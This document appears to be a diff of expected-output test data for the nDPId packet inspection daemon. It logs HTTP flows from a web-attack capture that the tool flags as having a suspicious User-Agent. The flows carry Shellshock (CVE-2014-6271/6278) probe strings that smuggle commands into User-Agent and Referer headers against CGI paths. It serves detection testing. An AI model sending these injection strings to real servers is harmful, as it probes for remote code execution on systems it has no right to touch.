00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 